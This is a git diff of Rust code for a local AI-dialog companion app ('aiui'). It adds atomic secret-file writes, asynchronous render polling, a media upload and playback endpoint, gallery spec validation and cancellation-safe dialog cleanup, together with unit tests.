+            std::fs::rename(&tmp, path).map_err(|e| format!("rename into place: {e}"))
+        });
+    if outcome.is_err() {
+        let _ = std::fs::remove_file(&tmp);
+    }
+    outcome
+}
+
+/// Replace exactly one occurrence of `placeholder`. Errors on 0 or >1.
+pub fn substitute_once(haystack: &str, placeholder: &str, value: &str) -> Result<String, String> {
+    if placeholder.is_empty() {
+        return Err("substitute mode requires a non-empty 'placeholder'".into());
+    }
+    match haystack.matches(placeholder).count() {
+        1 => Ok(haystack.replacen(placeholder, value, 1)),
+        0 => Err(format!("placeholder '{placeholder}' not found in target file")),
+        n => Err(format!("placeholder '{placeholder}' found {n}× (must be exactly 1)")),
+    }
+}
+
+/// Write `value` to the field's `target` as a local file operation and report
+/// what happened. `value` is never logged here; the returned [`WriteOutcome`]
+/// is the only thing that may reach the agent for a secret.
+///
+/// `create` writes `value` verbatim and refuses an existing path unless
+/// `overwrite` is set; `substitute` rewrites the existing file with its single
+/// `placeholder` replaced. The reported `bytes` is the length of what was
+/// written: `value` for `create`, the whole updated file for `substitute`.
+pub fn write_local(value: &str, target: &Target) -> WriteOutcome {
+    use std::borrow::Cow;
+    if !is_sane_target_path(&target.path) {
+        return WriteOutcome::fail(target.path.clone(), "invalid target path".into());
+    }
+    let path = expand_tilde(&target.path);
+    let display = path.display().to_string();
+    // An absent or unparseable `perm` falls back to the tight 0600 default.
+    let perm = target.perm.as_deref().and_then(parse_perm).or(Some(0o600));
+    // Settle the exact content first; every precondition failure returns
+    // before anything is written.
+    let content: Cow<'_, str> = match target.mode {
+        WriteMode::Create => {
+            if path.exists() && !target.overwrite {
+                return WriteOutcome::fail(
+                    display,
+                    "file exists and overwrite is false (mode: create)".into(),
+                );
+            }
+            // Borrowed: the value is written as-is, no copy is made here.
+            Cow::Borrowed(value)
+        }
+        WriteMode::Substitute => {
+            // Read-modify-write: replace in memory, then one atomic write.
+            let Some(placeholder) = target.placeholder.as_deref() else {
+                return WriteOutcome::fail(display, "substitute mode requires 'placeholder'".into());
+            };
+            let existing = match std::fs::read_to_string(&path) {
+                Ok(text) => text,
+                Err(e) => return WriteOutcome::fail(display, format!("read target: {e}")),
+            };
+            match substitute_once(&existing, placeholder, value) {
+                Ok(updated) => Cow::Owned(updated),
+                Err(e) => return WriteOutcome::fail(display, e),
+            }
+        }
+    };
+    match atomic_write(&path, content.as_bytes(), perm) {
+        Ok(()) => WriteOutcome::ok(display, content.len()),
+        Err(e) => WriteOutcome::fail(display, e),
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn parse_perm_octal() {
+        assert_eq!(parse_perm("0600"), Some(0o600));
+        assert_eq!(parse_perm("600"), Some(0o600));
+        assert_eq!(parse_perm("not-octal"), None);
+    }
+
+    #[test]
+    fn sane_target_path_basic() {
+        assert!(is_sane_target_path("~/.config/aiui/token"));
+        assert!(is_sane_target_path("/Users/me/.github_tokens/byte5ai"));
+        assert!(!is_sane_target_path(""));
+        assert!(!is_sane_target_path("a\nb"));
+        assert!(!is_sane_target_path("a\0b"));
+    }
+
+    #[test]
+    fn substitute_once_requires_exactly_one() {
+        assert_eq!(substitute_once("a TOKEN b", "TOKEN", "X").unwrap(), "a X b");
+        assert!(substitute_once("no marker", "TOKEN", "X").is_err());
+        assert!(substitute_once("TOKEN TOKEN", "TOKEN", "X").is_err());
+        assert!(substitute_once("x", "", "X").is_err());
+    }
+
+    #[test]
+    fn create_writes_and_refuses_clobber() {
+        let dir = std::env::temp_dir().join(format!("aiui-fw-{}", uuid::Uuid::new_v4()));
+        let path = dir.join("sub").join("key");
+        let target = Target {
+            mode: WriteMode::Create,
+            path: path.to_string_lossy().into_owned(),
+            perm: Some("0600".into()),
+            overwrite: false,
+            placeholder: None,
+        };
+        let out = write_local("s3cr3t", &target);
+        assert!(out.written, "first create: {:?}", out.error);
+        assert_eq!(std::fs::read_to_string(&path).unwrap(), "s3cr3t");
+        #[cfg(unix)]
+        {
+            use std::os::unix::fs::PermissionsExt;
+            let mode = std::fs::metadata(&path).unwrap().permissions().mode() & 0o777;
+            assert_eq!(mode, 0o600, "perm applied");
+        }
+        let out2 = write_local("other", &target);
+        assert!(!out2.written && out2.error.is_some(), "refuses clobber");
+        let target_ow = Target { overwrite: true, ..target };
+        let out3 = write_local("new", &target_ow);
+        assert!(out3.written);
+        assert_eq!(std::fs::read_to_string(&path).unwrap(), "new");
+        std::fs::remove_dir_all(&dir).ok();
+    }
+
+    #[test]
+    fn substitute_replaces_placeholder() {
+        let dir = std::env::temp_dir().join(format!("aiui-fw-{}", uuid::Uuid::new_v4()));
+        std::fs::create_dir_all(&dir).unwrap();
+        let path = dir.join("config.yaml");
+        std::fs::write(&path, "token: __PAT__\nother: 1\n").unwrap();
+        let target = Target {
+            mode: WriteMode::Substitute,
+            path: path.to_string_lossy().into_owned(),
+            perm: None,
+            overwrite: false,
+            placeholder: Some("__PAT__".into()),
+        };
+        let out = write_local("ghp_xxx", &target);
+        assert!(out.written, "{:?}", out.error);
+        assert_eq!(std::fs::read_to_string(&path).unwrap(), "token: ghp_xxx\nother: 1\n");
+        std::fs::remove_dir_all(&dir).ok();
+    }
+}
diff --git a/companion/src-tauri/src/http.rs b/companion/src-tauri/src/http.rs
index a5b0ccc..4b10bb5 100644
--- a/companion/src-tauri/src/http.rs
+++ b/companion/src-tauri/src/http.rs
@@ -1,9 +1,10 @@
 use crate::ack::AckRegistry;
 use crate::config::AppConfig;
-use crate::dialog::{DialogRequest, DialogState, DIALOG_TTL};
+use crate::dialog::{DialogState, DIALOG_TTL};
 use crate::lifetime::LifetimeStats;
 use axum::{
-    extract::State,
+    body::Bytes,
+    extract::{DefaultBodyLimit, Path, Query, State},
     http::{HeaderMap, StatusCode},
     response::IntoResponse,
     routing::{get, post},
@@ -17,28 +18,38 @@ use crate::logging::trace;
 use tauri::{AppHandle, Emitter, Manager};
 use tauri_plugin_updater::UpdaterExt;
 
-/// How long the `/render` handler waits for the frontend to acknowledge
-/// receipt of `dialog:show` before concluding the WebView event loop is
-/// dead and triggering a reload.
-const DIALOG_ACK_TIMEOUT: Duration = Duration::from_millis(500);
-
-/// Pause after `webview.reload()` before re-emitting `dialog:show`. Gives
-/// the freshly-loaded Svelte app time to mount and register its listener.
-const RELOAD_SETTLE: Duration = Duration::from_millis(300);
-
 /// How long `/health` waits for a `ui:ping` round-trip from the frontend
 /// before concluding the WebView is unresponsive.
 const UI_PING_TIMEOUT: Duration = Duration::from_millis(100);
 
-/// Idle-restart trigger: if the GUI has been alive longer than this AND
-/// hasn't served a render recently (see `IDLE_RESTART_QUIET`), the next
-/// render reloads the WebView before showing — flushes any drift that
-/// accumulated while nobody was watching.
-const IDLE_RESTART_UPTIME: Duration = Duration::from_secs(24 * 60 * 60);
-
-/// Minimum time between renders for the long-uptime reload to trigger.
-/// Prevents reloading mid-burst when many renders fire close together.
-const IDLE_RESTART_QUIET: Duration = Duration::from_secs(10 * 60);
+/// Header a bridge sets to opt into async `/render` (Step 3). Present →
+/// `POST /render` registers + surfaces the dialog, returns `{id, ttl}`
+/// immediately (202), and the caller polls `GET /render/{id}`. Absent → the
+/// legacy synchronous long-poll (POST holds the connection until the user
+/// answers). Backward-compatible: old bridges that don't set it keep working
+/// unchanged, so the wire contract stays v1.
+const ASYNC_RENDER_HEADER: &str = "x-aiui-async";
+
+/// How long a single `GET /render/{id}` long-poll parks before returning
+/// `{pending:true}` so the caller can re-poll (and emit a progress
+/// notification). Short enough to stay well under any client read timeout, so
+/// a tunnel/GUI blip can only ever cost one poll window, never a multi-minute
+/// held connection (the remote ReadError class this closes).
+const ASYNC_POLL_WINDOW: Duration = Duration::from_secs(25);
+
+/// Buffered terminal result for an async render, keyed by dialog id. The
+/// `POST /render` async branch spawns a task that awaits the user's answer and
+/// fills this; `GET /render/{id}` drains it. Decouples the dialog's lifetime
+/// from any single HTTP connection.
+struct AsyncSlot {
+    /// `Some` once the dialog reached a terminal outcome; drained by the first
+    /// successful GET. A `GET /render/{id}` poll-loops (cheap 200 ms ticks,
+    /// bounded by `ASYNC_POLL_WINDOW`) reading this — no cross-task notifier to
+    /// reason about, and a missed tick costs at most 200 ms, never correctness.
+    result: Option<crate::dialog::DialogResult>,
+    /// For the opportunistic sweep of resolved-but-never-collected slots.
+    created_at: Instant,
+}
 
 #[derive(Clone)]
 struct AppState {
@@ -47,13 +58,9 @@ struct AppState {
     ui_acks: Arc<AckRegistry>,
     lifetime: Arc<LifetimeStats>,
     app: AppHandle,
-    /// Process-start timestamp for the GUI. Used to evaluate the
-    /// idle-restart condition without requiring an OS sleep/wake hook.
-    started_at: Instant,
-    /// Last time `/render` produced (or attempted to produce) a dialog.
-    /// Mutex<Instant> is fine here — contention is bounded by the rate of
-    /// /render calls.
-    last_render_at: Arc<Mutex<Instant>>,
+    /// Buffered terminal results for async renders (Step 3), keyed by dialog
+    /// id. Empty in the all-synchronous case.
+    async_slots: Arc<Mutex<std::collections::HashMap<String, AsyncSlot>>>,
 }
 
 #[derive(Deserialize)]
@@ -61,6 +68,15 @@ struct RenderRequest {
     #[serde(default)]
     _timeout_s: Option<u64>,
     spec: serde_json::Value,
+    /// Human-legible session label set by the caller (Step 4, I8). Shown in
+    /// the dialog window's chrome so the user can tell which session a dialog
+    /// belongs to. Optional.
+    #[serde(default)]
+    session: Option<String>,
+    /// Origin host, auto-injected by the remote Python bridge (its hostname).
+    /// Optional; absent for local callers.
+    #[serde(default)]
+    session_origin: Option<String>,
 }
 
 #[derive(Serialize)]
@@ -87,6 +103,9 @@ struct HealthResponse {
     webview: WebviewHealth,
     dialogs: DialogHealth,
     children: ChildrenHealth,
+    /// Current host lifetime phase (Starting/Serving/GracePending/Exiting) —
+    /// issue #137 lifecycle state machine, surfaced for diagnostics.
+    lifecycle_phase: String,
 }
 
 #[derive(Serialize)]
@@ -111,9 +130,23 @@ struct ChildrenHealth {
     attached: usize,
 }
 
+/// Wire-contract version (Step 2, cooperative version floor). Bumped ONLY when
+/// the HTTP request/response shapes between the bridges and the companion
+/// change incompatibly — independent of the app's release version, which moves
+/// on every fix. Both bridges read it from `/version` (and `/probe`) and, on a
+/// hard mismatch, return a structured "restart this session" tool error instead
+/// of being externally killed. Ordinary app-version skew is tolerated as long
+/// as `wire_version` matches.
+///
+/// v1: the original `{spec}` → `{id,cancelled,result,reason}` contract.
+pub const WIRE_VERSION: u32 = 1;
+
 #[derive(Serialize)]
 struct VersionResponse {
     version: String,
+    /// See [`WIRE_VERSION`]. Surfaced so bridges can enforce a cooperative
+    /// compatibility floor without anyone killing anyone.
+    wire_version: u32,
     build_info: String,
     binary_path: String,
     updater_endpoint: String,
@@ -136,30 +169,59 @@ pub async fn serve(
     app: AppHandle,
 ) -> std::io::Result<()> {
     let port = cfg.http_port;
-    let now = Instant::now();
     let state = AppState {
         cfg,
         dialog,
         ui_acks,
         lifetime,
         app,
-        started_at: now,
-        last_render_at: Arc::new(Mutex::new(now)),
+        async_slots: Arc::new(Mutex::new(std::collections::HashMap::new())),
     };
 
+    // Media cache (video feature): resolve the dir up front (before `app`
+    // moves into the router state), serve it range-capably, and sweep any
+    // clips left over from a previous run so a crash can't leak disk.
+    let media_path = crate::media::media_dir(&state.app).unwrap_or_else(|e| {
+        trace(&format!("serve: media_dir unavailable: {e}"));
+        std::env::temp_dir().join("aiui-media")
+    });
+    let _ = std::fs::create_dir_all(&media_path);
+    crate::media::sweep(
+        &media_path,
+        crate::media::MEDIA_TTL,
+        crate::media::MEDIA_TOTAL_CAP,
+    );
+
     let router = Router::new()
         .route("/health", get(health))
         .route("/render", post(render))
+        .route("/render/:id", get(render_poll))
         .route("/version", get(version))
         .route("/update", post(update))
         .route("/ping", get(ping))
         .route("/probe", get(probe))
+        // Bridge pushes media bytes here; capped well above the per-file
+        // ceiling guard inside the handler so the 413 is ours, not axum's
+        // generic one.
+        .route(
+            "/media",
+            post(media_upload)
+                .layer(DefaultBodyLimit::max(crate::media::MEDIA_FILE_CAP as usize)),
+        )
+        // Capability-URL playback: unauthenticated (filename is a UUID),
+        // range-capable for video seeking via tower-http's ServeDir.
+        .nest_service(
+            "/media/blob",
+            tower_http::services::ServeDir::new(&media_path),
+        )
         .with_state(state);
 
     let addr = SocketAddr::from(([127, 0, 0, 1], port));
     let listener = bind_with_reuse(addr)?;
     trace(&format!("serve: listening on {addr}"));
     log::info!("[aiui] http listening on {addr}");
+    crate::lifecycle_log::record(crate::lifecycle_log::LifecycleEvent::Serving { port });
+    crate::lifecycle_log::transition(crate::lifecycle_log::Phase::Serving);
     axum::serve(listener, router)
         .await
         .map_err(std::io::Error::other)?;
@@ -222,6 +284,7 @@ async fn probe(
     Json(serde_json::json!({
         "aiui": true,
         "version": env!("CARGO_PKG_VERSION"),
+        "wire_version": WIRE_VERSION,
         "pid": std::process::id(),
         "build_sha": env!("AIUI_GIT_SHA"),
     }))
@@ -237,6 +300,76 @@ fn auth_ok(headers: &HeaderMap, token: &str) -> bool {
         .unwrap_or(false)
 }
 
+/// `POST /media` — the bridge pushes media bytes (video for the gallery/form
+/// widgets) here; we cache them on the Mac and hand back a loopback playback
+/// URL. Authenticated like every mutating endpoint. The body limit is set on
+/// the route layer; this handler adds the documented `MEDIA_FILE_CAP` guard
+/// so an oversize push gets *our* 413 with a clear message. The `?ext=`
+/// query names the cached file (and thus the served Content-Type); it is
+/// sanitised hard in `media::store`.
+///
+/// Returns `{ url, ttl_secs }`. `url` is `http://127.0.0.1:<port>/media/blob/
+/// <uuid>.<ext>` — valid both on the remote (where the bridge runs, via the
+/// reverse tunnel) and on the Mac (where the WebView plays it), since the
+/// tunnel maps `remote:7777 → mac:7777`.
+async fn media_upload(
+    State(state): State<AppState>,
+    headers: HeaderMap,
+    Query(params): Query<std::collections::HashMap<String, String>>,
+    body: Bytes,
+) -> impl IntoResponse {
+    if !auth_ok(&headers, &state.cfg.token) {
+        return (StatusCode::UNAUTHORIZED, "unauthorized").into_response();
+    }
+    if body.len() as u64 > crate::media::MEDIA_FILE_CAP {
+        return (
+            StatusCode::PAYLOAD_TOO_LARGE,
+            format!(
+                "media too large: {} bytes (max {})",
+                body.len(),
+                crate::media::MEDIA_FILE_CAP
+            ),
+        )
+            .into_response();
+    }
+    let ext = params.get("ext").map(String::as_str).unwrap_or("bin");
+    let dir = match crate::media::media_dir(&state.app) {
+        Ok(d) => d,
+        Err(e) => {
+            trace(&format!("media_upload: no cache dir: {e}"));
+            return (StatusCode::INTERNAL_SERVER_ERROR, "media cache unavailable")
+                .into_response();
+        }
+    };
+    let name = match crate::media::store(&dir, &body, ext) {
+        Ok(n) => n,
+        Err(e) => {
+            trace(&format!("media_upload: write failed: {e}"));
+            return (StatusCode::INTERNAL_SERVER_ERROR, "media write failed").into_response();
+        }
+    };
+    // Bound the cache on the way in — cheap dir scan, never blocks the render.
+    crate::media::sweep(
+        &dir,
+        crate::media::MEDIA_TTL,
+        crate::media::MEDIA_TOTAL_CAP,
+    );
+    let url = format!(
+        "http://127.0.0.1:{}/media/blob/{}",
+        state.cfg.http_port, name
+    );
+    trace(&format!(
+        "media_upload: stored {} ({} bytes)",
+        name,
+        body.len()
+    ));
+    Json(serde_json::json!({
+        "url": url,
+        "ttl_secs": crate::media::MEDIA_TTL.as_secs(),
+    }))
+    .into_response()
+}
+
 /// Composite health check. Probes the WebView event loop with a `ui:ping`
 /// round-trip, reads live counters from the dialog registry and lifetime
 /// tracker, and reports `ready` only when all three are healthy. Computed
@@ -280,6 +413,7 @@ async fn health(
         webview,
         dialogs,
         children,
+        lifecycle_phase: format!("{:?}", crate::lifecycle_log::current_phase()),
     };
 
     let status = if ready {
@@ -345,6 +479,7 @@ async fn version(
     }
     Ok(Json(VersionResponse {
         version: env!("CARGO_PKG_VERSION").to_string(),
+        wire_version: WIRE_VERSION,
         build_info: crate::logging::BUILD_INFO.to_string(),
         binary_path: crate::setup::app_binary_path(),
         updater_endpoint:
@@ -444,6 +579,14 @@ async fn update(
     let http_port = state.cfg.http_port;
     tokio::spawn(async move {
         tokio::time::sleep(Duration::from_millis(500)).await;
+        // Case (c): latch the single exit authority so the `ExitRequested`
+        // default-deny gate honours the restart-initiated exit instead of
+        // vetoing it (Invariant I1). `app.restart()` fires ExitRequested.
+        if let Some(auth) =
+            app_handle.try_state::<std::sync::Arc<crate::lifetime::ExitAuthority>>()
+        {
+            auth.authorize();
+        }
         crate::housekeeping::pre_exit_cleanup(http_port, "updater-restart");
         trace("update: restarting into new binary");
         app_handle.restart();
@@ -479,12 +622,45 @@ const KNOWN_FIELD_KINDS: &[&str] = &[
 /// specs.
 fn validate_spec(spec: &serde_json::Value) -> Result<(), (String, String)> {
     let kind = spec.get("kind").and_then(|v| v.as_str()).unwrap_or("");
-    if !matches!(kind, "ask" | "form" | "confirm") {
+    if !matches!(kind, "ask" | "form" | "confirm" | "gallery") {
         return Err((
-            format!("top-level 'kind' must be one of ask|form|confirm, got '{kind}'"),
-            "Use confirm for yes/no, ask for one-of-N, form for ≥2 inputs.".into(),
+            format!("top-level 'kind' must be one of ask|form|confirm|gallery, got '{kind}'"),
+            "Use confirm for yes/no, ask for one-of-N, form for ≥2 inputs, gallery for batch image/video review.".into(),
         ));
     }
+    if kind == "gallery" {
+        match spec.get("items").and_then(|v| v.as_array()) {
+            None => {
+                return Err((
+                    "gallery spec is missing the 'items' array".into(),
+                    "Provide items: [{value, src, label?, detail?}, …].".into(),
+                ));
+            }
+            Some(arr) if arr.is_empty() => {
+                return Err((
+                    "gallery 'items' is empty".into(),
+                    "A gallery needs at least one item to review.".into(),
+                ));
+            }
+            Some(arr) => {
+                for (i, it) in arr.iter().enumerate() {
+                    let has_value = it
+                        .get("value")
+                        .and_then(|v| v.as_str())
+                        .map(|s| !s.is_empty())
+                        .unwrap_or(false);
+                    if !has_value {
+                        return Err((
+                            format!("gallery item #{i} is missing a non-empty 'value'"),
+                            "Each item needs a stable 'value' string — it keys the returned decision."
+                                .into(),
+                        ));
+                    }
+                }
+            }
+        }
+        return Ok(());
+    }
     let mut fields: Vec<&serde_json::Value> = Vec::new();
     if let Some(tabs) = spec.get("tabs").and_then(|v| v.as_array()) {
         for t in tabs {
@@ -509,6 +685,209 @@ fn validate_spec(spec: &serde_json::Value) -> Result<(), (String, String)> {
     Ok(())
 }
 
+/// RAII cleanup for a registered render — closes the cancellation-safety hole
+/// behind the 409-storm + stranded-empty-window pair (2026-05-30 report).
+///
+/// `/render` registers a dialog, surfaces a window, then parks on
+/// `timeout(DIALOG_TTL=2h, result_rx)`. The MCP client gives up far sooner —
+/// the local Rust bridge's reqwest client times out at 300 s — and on any
+/// client-side give-up (timeout, ReadError, tunnel blip, slow dialog) Axum
+/// **drops this handler future**. None of the explicit teardown below then
+/// runs, so the registry entry sits pending for the full 2 h TTL — which,
+/// under the old single-occupancy rule, 409'd every subsequent `/render` —
+/// and the already-surfaced window is left stranded empty.
+///
+/// This guard is armed right after the dialog is registered and runs on *any*
+/// drop, including the future-cancelled case the explicit paths can't reach:
+/// it cancels the registry entry (freeing the slot immediately) and destroys
+/// the dialog window. It is disarmed once the handler completes its own
+/// terminal teardown, so the normal paths keep their precise behaviour and we
+/// don't double-hop the main thread. `dialog.cancel` is a no-op once the entry
+/// is gone and `destroy_dialog_window` is idempotent, so an over-fire is harmless.
+///
+/// Note: this only makes the synchronous handler cancellation-safe; the spec's
+/// Step 3 (async `/render`) removes the multi-minute held connection entirely.
+struct RenderGuard {
+    id: String,
+    dialog: Arc<DialogState>,
+    /// `None` only in unit tests, where no Tauri app exists to host a window.
+    app: Option<AppHandle>,
+    armed: bool,
+}
+
+impl RenderGuard {
+    /// Mark the handler's own teardown as complete so the `Drop` cleanup is skipped.
+    fn disarm(&mut self) {
+        self.armed = false;
+    }
+}
+
+impl Drop for RenderGuard {
+    fn drop(&mut self) {
+        if !self.armed {
+            return;
+        }
+        trace(&format!(
+            "render: handler future dropped before terminal teardown — \
+             cleaning up id={} (cancel registry entry + destroy window)",
+            self.id
+        ));
+        // Free the registry entry now instead of leaving it pending for the 2 h TTL.
+        self.dialog.cancel(&self.id);
+        // Tear down the surfaced window (labelled by id) so it can't strand.
+        if let Some(app) = &self.app {
+            let app_for_destroy = app.clone();
+            let id_for_destroy = self.id.clone();
+            let _ = app.run_on_main_thread(move || {
+                crate::destroy_dialog_window(&app_for_destroy, &id_for_destroy)
+            });
+        }
+    }
+}
+
+/// Wait (at most `DIALOG_TTL`) for a registered dialog's terminal outcome,
+/// then tear its window down. The synchronous POST path awaits this inline;
+/// the async path runs it in a detached task that fills the `AsyncSlot`.
+/// Sharing one function keeps resolution + teardown semantics identical for
+/// both paths. Always returns a `DialogResult`: the delivered one, or a
+/// cancelled one whose `reason` names why no result arrived.
+async fn resolve_dialog(
+    state: AppState,
+    id: String,
+    result_rx: tokio::sync::oneshot::Receiver<crate::dialog::DialogResult>,
+) -> crate::dialog::DialogResult {
+    // Both outcomes that aren't a delivered result are reported in the same
+    // cancelled shape; only `reason` tells them apart.
+    let cancelled_because = |reason: &'static str| crate::dialog::DialogResult {
+        id: id.clone(),
+        cancelled: true,
+        result: serde_json::Value::Null,
+        reason: Some(reason.into()),
+    };
+    trace(&format!("render: awaiting user response id={}", id));
+    let result = match tokio::time::timeout(DIALOG_TTL, result_rx).await {
+        Ok(Ok(answer)) => answer,
+        // The receiver errored: the sending half went away without a result.
+        Ok(Err(_)) => cancelled_because("channel_dropped"),
+        Err(_) => {
+            // TTL ran out with no response. Cancel the registry entry (frees
+            // its slot) and answer with the same 200-OK cancelled shape as a
+            // user-driven cancel — only `reason` differs (#36, the v0.4.45
+            // Bug #5 fix: never surface this as a transport error).
+            trace(&format!("render: TTL expired id={}", id));
+            state.dialog.cancel(&id);
+            cancelled_because("ttl_expired")
+        }
+    };
+    trace(&format!(
+        "render: got response id={} cancelled={}",
+        result.id, result.cancelled
+    ));
+    // Authoritative window teardown (v0.4.46, Bug B): the one place that
+    // guarantees a dialog window never outlives its dialog. Idempotent, so it
+    // is a no-op on the submit/cancel paths where the window is already gone.
+    let app = state.app.clone();
+    let window_id = id.clone();
+    let _ = state
+        .app
+        .run_on_main_thread(move || crate::destroy_dialog_window(&app, &window_id));
+    result
+}
+
+/// Opportunistic cleanup of the async-render slot map: discard every slot
+/// created more than `DIALOG_TTL` ago. This covers a caller that POSTs an
+/// async render whose dialog resolves but that never collects the result via
+/// GET (e.g. its process died after the POST). Run on each new async render;
+/// there is no background reaper.
+fn sweep_async_slots(state: &AppState) {
+    let now = Instant::now();
+    let mut slots = state.async_slots.lock().unwrap();
+    // Age is measured from `created_at`, whether or not a result has arrived
+    // yet, so a slot is kept for at most `DIALOG_TTL` overall.
+    slots.retain(|_, slot| now.duration_since(slot.created_at) <= DIALOG_TTL);
+}
+
+/// Outcome of looking up an async-render slot by id.
+enum SlotLook {
+    /// Resolved — the terminal result (already removed from the map).
+    Ready(crate::dialog::DialogResult),
+    /// Registered but not yet resolved.
+    Pending,
+    /// No such id — never an async render, or already collected.
+    Gone,
+}
+
+/// Look up the async-render slot for `id`. No slot → `Gone`. A slot whose
+/// `result` is still `None` → `Pending`, and the slot stays in the map. A slot
+/// holding a result → `Ready(result)`, and the slot is removed so the result
+/// is handed out at most once. Works on the bare map (not `AppState`) so the
+/// `/render/{id}` branching is unit-testable without a Tauri app.
+fn drain_async_slot(
+    slots: &mut std::collections::HashMap<String, AsyncSlot>,
+    id: &str,
+) -> SlotLook {
+    let Some(slot) = slots.get_mut(id) else {
+        return SlotLook::Gone;
+    };
+    let Some(result) = slot.result.take() else {
+        return SlotLook::Pending;
+    };
+    // Resolved: drop the emptied slot so a repeat lookup reports `Gone`.
+    slots.remove(id);
+    SlotLook::Ready(result)
+}
+
+/// GET `/render/{id}` — one bounded long-poll step for an async render (Step
+/// 3). Answers with the terminal `{id, cancelled, result, reason}` as soon as
+/// the slot resolves (draining it), with `{pending: true}` once a full
+/// `ASYNC_POLL_WINDOW` has passed unresolved, or with 404 when no slot exists
+/// for `id` (never an async render, or already collected). Callers re-issue
+/// the GET until they get a terminal answer or give up.
+async fn render_poll(
+    State(state): State<AppState>,
+    headers: HeaderMap,
+    Path(id): Path<String>,
+) -> impl IntoResponse {
+    if !auth_ok(&headers, &state.cfg.token) {
+        let body = Json(serde_json::json!({"error": "unauthorized"}));
+        return (StatusCode::UNAUTHORIZED, body).into_response();
+    }
+
+    let started = Instant::now();
+    loop {
+        // The lock guard is a temporary of this statement, so it is released
+        // before the `sleep` below is awaited.
+        let look = drain_async_slot(&mut state.async_slots.lock().unwrap(), &id);
+        match look {
+            SlotLook::Ready(outcome) => {
+                // Terminal answer; the slot was removed by the lookup itself.
+                trace(&format!("render_poll: delivered id={}", id));
+                let response = RenderResponse {
+                    id: outcome.id,
+                    cancelled: outcome.cancelled,
+                    result: outcome.result,
+                    reason: outcome.reason,
+                };
+                return Json(response).into_response();
+            }
+            SlotLook::Gone => {
+                // No slot under this id: never an async render, or collected.
+                trace(&format!("render_poll: unknown id={}", id));
+                let body = Json(serde_json::json!({"error": "unknown_render_id", "id": id}));
+                return (StatusCode::NOT_FOUND, body).into_response();
+            }
+            // Window used up: answer `pending` so the caller re-polls instead
+            // of this connection being held any longer.
+            SlotLook::Pending if started.elapsed() >= ASYNC_POLL_WINDOW => {
+                return Json(serde_json::json!({"pending": true, "id": id}))
+                    .into_response();
+            }
+            // Still in flight and inside the window: wait one tick, look again.
+            SlotLook::Pending => tokio::time::sleep(Duration::from_millis(200)).await,
+        }
+    }
+}
+
 async fn render(
     State(state): State<AppState>,
     headers: HeaderMap,
@@ -554,245 +933,108 @@ async fn render(
             .into_response();
     }
 
-    // v0.4.36: try_register rejects when a dialog is already in flight
-    // instead of evicting the existing one. Two parallel callers — multi-
-    // call-per-turn, two Claude sessions, or a stale window from a prior
-    // timeout — would otherwise overlay each other in the single dialog
-    // window, with the older request's `oneshot` resolving as `evicted`
-    // exactly while the user was still looking at it. The 409 response
-    // gives the second caller a structured "busy" answer so the agent
-    // can choose to retry or tell the user the dialog is held by
-    // something else. Setup-window-driven UI calls don't go through
-    // /render at all, so this only governs agent dialog traffic.
-    let (id, result_rx, ack_rx) = match state.dialog.try_register() {
-        Ok(triple) => triple,
-        Err(busy) => {
-            trace(&format!(
-                "render: rejected — companion busy (pending={}, oldest_age={}s)",
-                busy.pending_count, busy.oldest_age_secs
-            ));
-            return (
-                StatusCode::CONFLICT,
-                Json(serde_json::json!({
-                    "error": "busy",
-                    "pending_count": busy.pending_count,
-                    "oldest_age_secs": busy.oldest_age_secs,
-                })),
-            )
-                .into_response();
+    // Multi-window (Step 4, I8): N dialogs may be in flight at once — the
+    // single-occupancy 409 is gone. `register_dialog` stores the request (the
+    // per-id window pulls it via `get_dialog_spec`) and only evicts the oldest
+    // if the hard cap is hit. Setup-window UI calls don't go through /render,
+    // so this governs agent dialog traffic only. Size is estimated from the
+    // spec before it moves into the registry.
+    let size = crate::dialog::resolve_start_size(&req.spec);
+    // Native title-bar text (I8): "aiui — <session> · <origin>", computed
+    // before session/origin move into the registry. Set on the window by Rust
+    // (frontend setTitle is permission-gated). Falls back to "aiui".
+    let window_title = {
+        let mut parts: Vec<&str> = Vec::new();
+        if let Some(s) = req.session.as_deref().filter(|s| !s.is_empty()) {
+            parts.push(s);
+        }
+        if let Some(o) = req.session_origin.as_deref().filter(|o| !o.is_empty()) {
+            parts.push(o);
+        }
+        if parts.is_empty() {
+            "aiui".to_string()
+        } else {
+            format!("aiui — {}", parts.join(" · "))
         }
     };
+    let (id, result_rx) = state.dialog.register_dialog(
+        req.spec,
+        req.session,
+        req.session_origin,
+        DIALOG_TTL.as_secs(),
+    );
     trace(&format!("render: registered id={}", id));
-    let dr = DialogRequest {
+    // Cancellation-safety net: until the terminal teardown (sync) or the
+    // hand-off to the detached task (async), a dropped handler future must not
+    // leak the registry entry or strand the window. See `RenderGuard`.
+    let mut guard = RenderGuard {
         id: id.clone(),
-        spec: req.spec,
-        // Sent so the frontend can schedule warning banners + auto-cancel
-        // a fraction before the backend sweep fires. Single source of
-        // truth lives in `DIALOG_TTL`. v0.4.41.
-        ttl_secs: DIALOG_TTL.as_secs(),
+        dialog: state.dialog.clone(),
+        app: Some(state.app.clone()),
+        armed: true,
     };
 
-    // ── Idle-restart check (#41) ────────────────────────────────────────
-    // If the GUI has been up for a long time and the last render was a
-    // while ago, reload the WebView before serving this one. Catches
-    // accumulated drift (sleep/wake artefacts, stuck event listeners)
-    // *exactly* when it would matter — not on a wall-clock timer.
-    //
-    // Important: never reload while a previous dialog is still pending.
-    // The reload tears down the WebView's JS state including any active
-    // dialog the user might be looking at, and the still-awaiting
-    // `/render` handler would get a `channel_dropped` cancellation
-    // instead of the user's actual answer. Only reload when the registry
-    // is empty. Issue #H-6 in v0.4.10 review.
-    {
-        let last = *state.last_render_at.lock().unwrap();
-        let pending = state.dialog.stats().orphan_count;
-        if state.started_at.elapsed() > IDLE_RESTART_UPTIME
-            && last.elapsed() > IDLE_RESTART_QUIET
-            && pending == 0
-        {
-            trace(&format!(
-                "render: idle-restart trigger (uptime {:?}, last_render {:?} ago, registry empty)",
-                state.started_at.elapsed(),
-                last.elapsed()
-            ));
-            reload_main_webview(&state.app);
-            tokio::time::sleep(RELOAD_SETTLE).await;
-        } else if state.started_at.elapsed() > IDLE_RESTART_UPTIME
-            && last.elapsed() > IDLE_RESTART_QUIET
-        {
-            trace(&format!(
-                "render: idle-restart suppressed — {} pending dialog(s) in registry",
-                pending
-            ));
-        }
-    }
-
-    // Mark this render attempt — done early so the ack/recreate path
-    // still resets the idle clock even if the user closes the dialog.
-    *state.last_render_at.lock().unwrap() = Instant::now();
-
-    // Surface the window from the main thread. If the window is being
